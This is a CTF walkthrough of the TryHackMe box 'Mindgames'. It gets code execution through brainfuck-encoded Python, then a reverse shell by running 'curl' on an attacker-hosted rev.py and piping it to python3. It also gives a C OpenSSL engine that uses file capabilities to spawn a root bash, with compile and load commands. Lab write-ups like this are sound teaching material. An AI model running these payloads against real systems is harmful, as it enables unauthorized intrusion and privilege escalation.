MindGames Walkthrough TryHackMe
Hello guys back again with another walkthrough this time I’ll be tackling Mindgames from TryHackMe. The box was a really funny and nice one when it comes to the initial foothold since the payload had to be encoded in brainfuck cipher for it to work. Basically the web application executes python code that is encoded in brainfuck cipher and after you know this you cause the web application to upload a reverse shell and execute the reverse shell file to get a shell on the box user done!!. For root it’s a little bit hidden and if you don’t do your enumeration well you might miss it. OpenSSL has capabilities set and we execute a engine that basically gives us root on the box. Its a really fun box and thanks to the creator of the box ninjaJC01. This is the second box I’ve done that he has created and both of them you have to exploit capabilities to get root. Without much say let’s jump in.
As always we’ll start off with a nmap scan to know the services that are running on the box
And we get two ports are open 22 and 80. SSH requires authentication which we don’t have and HTTP is running a website called Mindgames. There are two things we can do from here
- Bruteforce secure-shell (SSH)
- Enumerate HTTP
I opted against bruteforcing ssh since we don’t even have a valid username and decided to enumerate HTTP
On opening the webpage we get a standard webpage
So and what stood out to me was that the symbols is a cipher called brainfuck (I’ve had some experience with them before that’s why i recognized them in an instance). We’ll get to that in a little while………. but i decided to see if common files like robots.txt existed on the web server.
I wasn’t so lucky. So i decided to run gobuster which is a tool used to brute-force URIs including directories and files as well as DNS subdomains while i enumerate the web application manually
While gobuster was running i decided to decode the brainfuck cipher that was on the homepage of the web application using an online tool i’ll leave a link in the description
The first Ciper looks like a python code that just prints hello , world
The second cipher after decoding it ……it just does arithmetic operations and prints the result
Looking at the bottom of the homepage we get something interesting which tells us that we can enter a code and the web application will run it
Since we found the cipher was a python program why don’t we try running a python code and see how it behaves
I just entered a page that should print like my page on the output
But when i click run it! i get not result back. This got me thinking what if the python code needs to be encoded in brainfuck cipher like the rest of the encodings that we found on the homepage for it to work
Since the website supports both decoding and encoding in brainfuck cipher i decided to encode the python code
Copied the encoded string to my clipboard and pasted it in the homepage again and run the code
And voila as you see above our code got executed. Knowing that we can execute python code why not don’t we turn it to remote code execution using the python one liner bellow which is a simple command that imports os library allowing us to execute system commands on our target
__import__("os").system("ls -la")But remember the payload needs to be encoded
On running the encoded payload on the target box we get code execution
Now let’s turn code execution to a reverse shell on the box
First i intercepted the request using burpsuite since it makes my job way easier
I created a python reverse shell one line and saved it on my box in a script called rev.py
- I started a netcat listener on my local box
2. Hosted the python script on a HTTP web server on my box and curl the python file from my box and piped the output to python3
__import__("os").system("curl 10.8.*.*:8000/rev.py | python3")Change the IP Address Encode the payload using brainfuck cipher
And send the encoded payload using burpsuite i got no response
But looking back in my terminal where i had set a netcat listener i got a shell on my local box sweet!!!!!
Looking at mindgames home directory we have the user flag
The next logical thing is to do is to run linpeas a Linux privilege escalation awesome suite script that automatically checks for privilege escalation vectors and outputs the results using really awesome colors
So i downloaded linpeas on the box and ran it. And found OpenSSL had capabilities set that allows us to change UID
This allows us to load shared libraries that may be used to run code in the binary execution context.
So i created a simple OpenSSL engine that when compile it will execute bash as root
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <openssl/engine.h>static int bind (ENGINE *e, const char *id)
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
Then i compiled the OpenSSL engine using the command below this will give us an executable
gcc -fPIC -o root.o -c root.c && gcc -shared -o root.so -lcrypto root.oIf you get the error below you need to install the package below
You need to install the package libssl-dev using the command below
sudo apt-get install libssl-devThen compile the file and you’ll get a nice little executable as seen below
Now i upload the executable to the target system and executed it using the command below
openssl engine -t -c `pwd`/root.soAnd voila i had a root shell on the box
Now it’s time to submit the root flag and earn our points
That’s it for now guys till next time take care folks. If you liked the walkthrough you can clap for me down below